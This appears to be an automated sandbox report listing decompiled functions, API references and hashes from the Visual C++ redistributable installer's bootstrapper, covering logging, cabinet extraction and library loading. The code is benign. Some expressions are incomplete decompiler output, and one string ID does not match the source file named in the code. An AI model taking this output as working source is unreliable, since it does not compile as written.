                                                                          • Opcode ID: 96a3faf7a479cd85b92b21aaad7d1b9eb5879ed4391482e15c8543ff9f3c217f
                                                                          • Instruction ID: 3f2818ffce00b8ec860e5b647d5dae0f0e6f3cacb0e16800141df5593c535ed5
                                                                          • Opcode Fuzzy Hash: 96a3faf7a479cd85b92b21aaad7d1b9eb5879ed4391482e15c8543ff9f3c217f
                                                                          • Instruction Fuzzy Hash: BF319035A0021DAADFA1AFD5C8419FFB7B9EB00350F94417AFE00A6551D7319A40EB54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F0658 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62filestringCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E000F0658(void* __ecx, void* __edx, CHAR* _a4) {
				long _v8;
				int _t9;
				int _t13;
				CHAR* _t18;
				void* _t21;
				void* _t22;
				void* _t25;
				void* _t28;

				_t22 = __edx;
				_push(__ecx);
				_t18 = _a4;
				_t28 = 0;
				_t25 = 0;
				_v8 = _v8 & 0;
				_t9 = lstrlenA(_t18);
				_t21 =  *0x11a774; // 0xffffffff
				_a4 = _t9;
				if(_t21 != 0xffffffff) {
					if(_t9 == 0) {
						L9:
						return _t28;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = WriteFile(_t21, _t25 + _t18, _t9 - _t25,  &_v8, 0); // executed
						if(_t13 != 0) {
							goto L6;
						}
						_t28 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
						if(_t28 < 0) {
							E000B37D3(_t14, "logutil.cpp", 0x310, _t28);
							goto L9;
						}
						L6:
						_t25 = _t25 + _v8;
						_t9 = _a4;
						if(_t25 >= _t9) {
							goto L9;
						}
						_t21 =  *0x11a774; // 0xffffffff
					}
				}
				_t28 = E000B2384(_t21, _t22, 0x11b608, _t18, 0);
				if(_t28 >= 0) {
					_t28 = 0;
				}
				goto L9;
			}











                                                                          0x000f0658
                                                                          0x000f065b
                                                                          0x000f065d
                                                                          0x000f0662
                                                                          0x000f0664
                                                                          0x000f0666
                                                                          0x000f066a
                                                                          0x000f0670
                                                                          0x000f0676
                                                                          0x000f067c
                                                                          0x000f0696
                                                                          0x000f06ea
                                                                          0x000f06f2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f0698
                                                                          0x000f0698
                                                                          0x000f06a6
                                                                          0x000f06ae
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f06c1
                                                                          0x000f06c6
                                                                          0x000f06e5
                                                                          0x00000000
                                                                          0x000f06e5
                                                                          0x000f06c8
                                                                          0x000f06c8
                                                                          0x000f06cb
                                                                          0x000f06d0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f06d2
                                                                          0x000f06d2
                                                                          0x000f0698
                                                                          0x000f068a
                                                                          0x000f068e
                                                                          0x000f0690
                                                                          0x000f0690
                                                                          0x00000000

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,?,000EFF0B,000CA1AD,000CA1AD,00000000,00000000,0000FDE9,?,?,000CA1AD), ref: 000F066A
                                                                          • WriteFile.KERNELBASE(FFFFFFFF,00000000,00000000,0000FDE9,00000000,?,?,000EFF0B,000CA1AD,000CA1AD,00000000,00000000,0000FDE9,?,?,000CA1AD), ref: 000F06A6
                                                                          • GetLastError.KERNEL32(?,?,000EFF0B,000CA1AD,000CA1AD,00000000,00000000,0000FDE9,?,?,000CA1AD), ref: 000F06B0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWritelstrlen
                                                                          • String ID: @Met$logutil.cpp
                                                                          • API String ID: 606256338-637279948
                                                                          • Opcode ID: c4f9c3724b3cd90ccbb7014bd3bebe091c22f0ffe99703cfce3233c5cd0147ee
                                                                          • Instruction ID: 5cb276b9518f05e485b138dd190593e737efecc1683b6065fb1a87b5c5f1928f
                                                                          • Opcode Fuzzy Hash: c4f9c3724b3cd90ccbb7014bd3bebe091c22f0ffe99703cfce3233c5cd0147ee
                                                                          • Instruction Fuzzy Hash: 8911E972A012286BD3249A75CD48DFFBAACEBD4761B004225FE05D7941DB319D10D6E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000D074E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 52fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 63%
                                                                          			E000D074E(void* __ecx, void* __eflags, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t19;
				signed short _t22;
				signed int _t27;
				intOrPtr _t31;
				struct _OVERLAPPED* _t34;

				_t27 =  *0x11aac0; // 0x0
				_t34 = 0;
				_v8 = 0;
				_t31 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t27 * 4)) + 4));
				E000D114F(__eflags, _t31 + 0x1c, _a4, _a12); // executed
				_t19 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
				if(_t19 == 0) {
					_t22 = GetLastError();
					_t38 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
					_t34 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
					E000B37D3(0x80004005, "cabextract.cpp", 0x2ec, _t34);
					_push("Failed to read during cabinet extraction.");
					E000F012F();
					_t27 = _t34;
				}
				 *((intOrPtr*)(_t31 + 0x30)) = _t34;
				_t21 =  <  ? _t27 | 0xffffffff : _v8;
				return  <  ? _t27 | 0xffffffff : _v8;
			}









                                                                          0x000d0752
                                                                          0x000d0766
                                                                          0x000d076b
                                                                          0x000d076e
                                                                          0x000d0778
                                                                          0x000d078b
                                                                          0x000d0793
                                                                          0x000d0795
                                                                          0x000d07a6
                                                                          0x000d07b0
                                                                          0x000d07be
                                                                          0x000d07c3
                                                                          0x000d07c9
                                                                          0x000d07cf
                                                                          0x000d07cf
                                                                          0x000d07d0
                                                                          0x000d07dc
                                                                          0x000d07e3

                                                                          APIs
                                                                            • Part of subcall function 000D114F: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,000D077D,?,?,?), ref: 000D1177
                                                                            • Part of subcall function 000D114F: GetLastError.KERNEL32(?,000D077D,?,?,?), ref: 000D1181
                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 000D078B
                                                                          • GetLastError.KERNEL32 ref: 000D0795
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast$PointerRead
                                                                          • String ID: @Met$Failed to read during cabinet extraction.$cabextract.cpp
                                                                          • API String ID: 2170121939-2568642345
                                                                          • Opcode ID: b4311b52141434e67dab94a3e7c5d4ba6490d250ce08072058a6d10f10282f4f
                                                                          • Instruction ID: 668ecaf1bd92a5b224712b3af072dad163f47d94b3e92ab61ea16098f07ea6e9
                                                                          • Opcode Fuzzy Hash: b4311b52141434e67dab94a3e7c5d4ba6490d250ce08072058a6d10f10282f4f
                                                                          • Instruction Fuzzy Hash: 9301A572A00324BBDB109FA8DC04EDA7BA9FF04760F014119FD08D7650D7319A10DBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F4840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000F4840(void* __ecx, WCHAR* _a4, intOrPtr _a8) {
				void* _t4;
				void* _t6;
				void* _t14;
				void* _t16;
				void* _t18;

				_t14 = __ecx;
				if(_a4 != 0) {
					_t6 = CreateFileW(_a4, 0x80, 1, 0, 3, 0x80, 0); // executed
					_t16 = _t6;
					if(_t16 != 0xffffffff) {
						_t18 = E000F48CB(_t14, _t16, _a8);
						FindCloseChangeNotification(_t16); // executed
					} else {
						_t21 =  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
						_t18 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "fileutil.cpp", 0x228, _t18);
					}
				} else {
					_t18 = 0x80070057;
					E000B37D3(_t4, "fileutil.cpp", 0x223, 0x80070057);
				}
				return _t18;
			}








                                                                          0x000f4840
                                                                          0x000f4848
                                                                          0x000f4874
                                                                          0x000f487a
                                                                          0x000f487f
                                                                          0x000f48ba
                                                                          0x000f48bd
                                                                          0x000f4881
                                                                          0x000f4892
                                                                          0x000f489c
                                                                          0x000f48aa
                                                                          0x000f48aa
                                                                          0x000f484a
                                                                          0x000f484a
                                                                          0x000f485a
                                                                          0x000f485a
                                                                          0x000f48c8

                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,000D8A30,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 000F4874
                                                                          • GetLastError.KERNEL32(?,000D8A30,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,userVersion,000002C0,000000B0), ref: 000F4881
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorFileLast
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 1214770103-2299628883
                                                                          • Opcode ID: 0900e41c390aca23c95fb1af164d760e124f10df83790796eeed7adcca463cbd
                                                                          • Instruction ID: 26fd6f9acfaa6d7aa2b65358c85478497f0731bd68dd40bd48d69685eb1e18cd
                                                                          • Opcode Fuzzy Hash: 0900e41c390aca23c95fb1af164d760e124f10df83790796eeed7adcca463cbd
                                                                          • Instruction Fuzzy Hash: 8A018672680224B7F73126A5AC49FBF3698DB44BA0F114221FF05AB9D1CE694D41A6F4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000D114F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 31%
                                                                          			E000D114F(void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				int _t11;
				void* _t19;
				long _t20;

				_t20 = 0x80070490;
				_t19 = E000D1127(_a4, _a8);
				if(_t19 != 0) {
					_t20 = 0;
					_push(0);
					_t11 = SetFilePointerEx(_a8,  *(_t19 + 8),  *(_t19 + 0xc), 0); // executed
					if(_t11 != 0) {
						 *(_t19 + 8) =  *(_t19 + 8) + _a12;
						asm("adc [edi+0xc], esi");
					} else {
						_t23 =  <=  ? GetLastError() : _t12 & 0x0000ffff | 0x80070000;
						_t20 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t12 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "cabextract.cpp", 0x37e, _t20);
						_push("Failed to move to virtual file pointer.");
						_push(_t20);
						E000F012F();
					}
				}
				return _t20;
			}






                                                                          0x000d1157
                                                                          0x000d1164
                                                                          0x000d1168
                                                                          0x000d116a
                                                                          0x000d116c
                                                                          0x000d1177
                                                                          0x000d117f
                                                                          0x000d11c1
                                                                          0x000d11c4
                                                                          0x000d1181
                                                                          0x000d1192
                                                                          0x000d119c
                                                                          0x000d11aa
                                                                          0x000d11af
                                                                          0x000d11b4
                                                                          0x000d11b5
                                                                          0x000d11bb
                                                                          0x000d117f
                                                                          0x000d11cc

                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,000D077D,?,?,?), ref: 000D1177
                                                                          • GetLastError.KERNEL32(?,000D077D,?,?,?), ref: 000D1181
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID: @Met$Failed to move to virtual file pointer.$cabextract.cpp
                                                                          • API String ID: 2976181284-1626086099
                                                                          • Opcode ID: dccbf0cbe27795228b5a857d738c32f7e337a4fe313297c482d04cafb265aa16
                                                                          • Instruction ID: 4e89a5c19f815c54b19fbc12c2d49367f405d23373336976e6cee65db75eab44
                                                                          • Opcode Fuzzy Hash: dccbf0cbe27795228b5a857d738c32f7e337a4fe313297c482d04cafb265aa16
                                                                          • Instruction Fuzzy Hash: EA01F236640325BBE7211A669C04ED7FF99FF017A0B018226FE0896650DB358C10DAE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000BD7CF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 75%
                                                                          			E000BD7CF(intOrPtr _a4) {
				_Unknown_base(*)()* _t12;
				int _t13;
				signed int _t18;
				void* _t19;
				intOrPtr _t22;

				_t22 = _a4;
				_t19 = 0;
				_t18 =  *(_t22 + 0x10);
				if(_t18 != 0) {
					 *((intOrPtr*)( *_t18 + 8))(_t18);
					 *(_t22 + 0x10) =  *(_t22 + 0x10) & 0;
				}
				if( *(_t22 + 0xc) != _t19) {
					_t12 = GetProcAddress( *(_t22 + 0xc), "BootstrapperApplicationDestroy");
					if(_t12 != 0) {
						 *_t12();
					}
					_t13 = FreeLibrary( *(_t22 + 0xc)); // executed
					if(_t13 == 0) {
						_t19 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
					}
					 *(_t22 + 0xc) =  *(_t22 + 0xc) & 0x00000000;
				}
				return _t19;
			}








                                                                          0x000bd7d3
                                                                          0x000bd7d7
                                                                          0x000bd7d9
                                                                          0x000bd7de
                                                                          0x000bd7e3
                                                                          0x000bd7e6
                                                                          0x000bd7e6
                                                                          0x000bd7ec
                                                                          0x000bd7f6
                                                                          0x000bd7fe
                                                                          0x000bd800
                                                                          0x000bd800
                                                                          0x000bd805
                                                                          0x000bd80d
                                                                          0x000bd820
                                                                          0x000bd820
                                                                          0x000bd823
                                                                          0x000bd823
                                                                          0x000bd82c

                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 000BD7F6
                                                                          • FreeLibrary.KERNELBASE(?,?,000B47D1,00000000,?,?,000B5386,?,?), ref: 000BD805
                                                                          • GetLastError.KERNEL32(?,000B47D1,00000000,?,?,000B5386,?,?), ref: 000BD80F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorFreeLastLibraryProc
                                                                          • String ID: @Met$BootstrapperApplicationDestroy
                                                                          • API String ID: 1144718084-3300157853
                                                                          • Opcode ID: e6a9325ee65cfacce2ee5a81d20de70a8fd5ad99a25194c5d6216c2f9df5265c
                                                                          • Instruction ID: 078a2d31305504187c1c57ca5f69d11ba7bcb238618e6369219af1528b445036
                                                                          • Opcode Fuzzy Hash: e6a9325ee65cfacce2ee5a81d20de70a8fd5ad99a25194c5d6216c2f9df5265c
                                                                          • Instruction Fuzzy Hash: 6BF0F9362007019FE7205FA6DC08AA7F7E9BF80762B01C53EE566C6960EB75E814DF60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000CF086 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 30%
                                                                          			E000CF086(intOrPtr _a4, long _a8) {
				int _t5;
				signed short _t7;
				int _t13;

				_t13 = 0;
				_t5 = PostThreadMessageW( *(_a4 + 0x10), 0x9001, 0, _a8); // executed
				if(_t5 == 0) {
					_t7 = GetLastError();
					_t16 =  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
					_t13 =  >=  ? 0x80004005 :  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
					E000B37D3(0x80004005, "EngineForApplication.cpp", 0x292, _t13);
					_push("Failed to post plan message.");
					_push(_t13);
					E000F012F();
				}
				return _t13;
			}






                                                                          0x000cf090
                                                                          0x000cf09b
                                                                          0x000cf0a3
                                                                          0x000cf0a5
                                                                          0x000cf0b6
                                                                          0x000cf0c0
                                                                          0x000cf0ce
                                                                          0x000cf0d3
                                                                          0x000cf0d8
                                                                          0x000cf0d9
                                                                          0x000cf0df
                                                                          0x000cf0e4

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post plan message.
                                                                          • API String ID: 2609174426-3019743703
                                                                          • Opcode ID: adf96437d4fca1fbbd5445e7703b96d3dec2bd9275d0da47aeee7b9ce11f8e32
                                                                          • Instruction ID: 01e3a3c3d68f6606be914013063d7edb430b44c41f03bdd18f91899c9e4e35d5
                                                                          • Opcode Fuzzy Hash: adf96437d4fca1fbbd5445e7703b96d3dec2bd9275d0da47aeee7b9ce11f8e32
                                                                          • Instruction Fuzzy Hash: C3F030327843347BE7616AAA9C09E977BC9EF04BA0F014025FD48EA5A2DA658D00D6E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000CF194 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 30%
                                                                          			E000CF194(intOrPtr _a4, int _a8) {
				int _t5;
				signed short _t7;
				long _t13;

				_t13 = 0;
				_t5 = PostThreadMessageW( *(_a4 + 0x10), 0x9005, _a8, 0); // executed
				if(_t5 == 0) {
					_t7 = GetLastError();
					_t16 =  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
					_t13 =  >=  ? 0x80004005 :  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
					E000B37D3(0x80004005, "EngineForApplication.cpp", 0x2c3, _t13);
					_push("Failed to post shutdown message.");
					_push(_t13);
					E000F012F();
				}
				return _t13;
			}






                                                                          0x000cf19b
                                                                          0x000cf1a9
                                                                          0x000cf1b1
                                                                          0x000cf1b3
                                                                          0x000cf1c4
                                                                          0x000cf1ce
                                                                          0x000cf1dc
                                                                          0x000cf1e1
                                                                          0x000cf1e6
                                                                          0x000cf1e7
                                                                          0x000cf1ed
                                                                          0x000cf1f2

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post shutdown message.
                                                                          • API String ID: 2609174426-1833910594
                                                                          • Opcode ID: ca303587bb133e74a0632b566df592a4f4a575dbdafffbe56b4d61c1b7895f10
                                                                          • Instruction ID: dd602f2dca9cc30ce9d1a4381a6071861ef2e11d07dee5425fbe91163a10c119
                                                                          • Opcode Fuzzy Hash: ca303587bb133e74a0632b566df592a4f4a575dbdafffbe56b4d61c1b7895f10
                                                                          • Instruction Fuzzy Hash: 49F037327453357BE7206AA99C09ED77BC9EF04B60F014025BD08E6591DA558D00D6E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000D051A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetEvent.KERNEL32(?,00000000,?,000D145A,00000000,00000000,?,000BC121,00000000,?,?,000DAB88,?,00000000,?,?), ref: 000D0524
                                                                          • GetLastError.KERNEL32(?,000D145A,00000000,00000000,?,000BC121,00000000,?,?,000DAB88,?,00000000,?,?,?,00000000), ref: 000D052E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorEventLast
                                                                          • String ID: @Met$Failed to set begin operation event.$cabextract.cpp
                                                                          • API String ID: 3848097054-3980609822
                                                                          • Opcode ID: 8565f975bd412812488867d01c585c9bc70374ab9ef439f368fe4f6f2294924f
                                                                          • Instruction ID: 96db44b8bc2f6cabac85aa13a390222f0dff6cfadf7e212d233dbfb03351a641
                                                                          • Opcode Fuzzy Hash: 8565f975bd412812488867d01c585c9bc70374ab9ef439f368fe4f6f2294924f
                                                                          • Instruction Fuzzy Hash: 01F0A073A40B306BE720A6A9AC05BEB76D8DF047A1B010126FE09E7691EA559D0096E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000CE978 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 30%
                                                                          			E000CE978(intOrPtr _a4, long _a8) {
				int _t5;
				signed short _t7;
				int _t13;

				_t13 = 0;
				_t5 = PostThreadMessageW( *(_a4 + 0x10), 0x9003, 0, _a8); // executed
				if(_t5 == 0) {
					_t7 = GetLastError();
					_t16 =  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
					_t13 =  >=  ? 0x80004005 :  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
					E000B37D3(0x80004005, "EngineForApplication.cpp", 0x2b4, _t13);
					_push("Failed to post apply message.");
					_push(_t13);
					E000F012F();
				}
				return _t13;
			}






                                                                          0x000ce982
                                                                          0x000ce98d
                                                                          0x000ce995
                                                                          0x000ce997
                                                                          0x000ce9a8
                                                                          0x000ce9b2
                                                                          0x000ce9c0
                                                                          0x000ce9c5
                                                                          0x000ce9ca
                                                                          0x000ce9cb
                                                                          0x000ce9d1
                                                                          0x000ce9d6

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post apply message.
                                                                          • API String ID: 2609174426-2658443504
                                                                          • Opcode ID: 8f5550112253e25810e794a75696c7b356686d9e8897e309369b5e757d54c7c8
                                                                          • Instruction ID: e743dd9eaa8c53b7ecb19ede9a0a2b4d106ee78003b72962421307d6990b710f
                                                                          • Opcode Fuzzy Hash: 8f5550112253e25810e794a75696c7b356686d9e8897e309369b5e757d54c7c8
                                                                          • Instruction Fuzzy Hash: C0F037327443346BE72176A99C05E977BC9EF04BA0F014025BD08E6592D6658D10D6E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B37EA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79libraryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000B37EA(void* __edx, intOrPtr _a4, struct HINSTANCE__** _a8, intOrPtr _a12) {
				signed int _v8;
				short _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t15;
				signed int _t20;
				void* _t22;
				struct HINSTANCE__* _t26;
				signed short _t27;
				void* _t29;
				void* _t31;
				struct HINSTANCE__** _t32;
				void* _t33;
				void* _t36;
				intOrPtr _t37;
				signed int _t42;

				_t36 = __edx;
				_t15 =  *0x11a008; // 0xf77c1860
				_v8 = _t15 ^ _t42;
				_t32 = _a8;
				_t37 = _a12;
				E000DF670(_t37,  &_v528, 0, 0x208);
				_t38 = 0x104;
				_t20 = GetSystemDirectoryW( &_v528, 0x104);
				if(_t20 != 0) {
					_t33 = 0x5c;
					if(_t33 ==  *((intOrPtr*)(_t42 + _t20 * 2 - 0x20e))) {
						L6:
						_t22 = E000B36B4(_t33,  &_v528, _t38, _a4);
						_t39 = _t22;
						if(_t22 < 0) {
							L10:
							return E000DDE36(_t32, _v8 ^ _t42, _t36, _t37, _t39);
						}
						_t26 = LoadLibraryW( &_v528); // executed
						 *_t32 = _t26;
						if(_t26 == 0) {
							goto L1;
						}
						if(_t37 != 0) {
							_t29 = E000B21A5(_t37,  &_v528, 0x104); // executed
							_t39 = _t29;
						}
						goto L10;
					}
					_t31 = E000B3665(_t33,  &_v528, 0x104, "\\", 1);
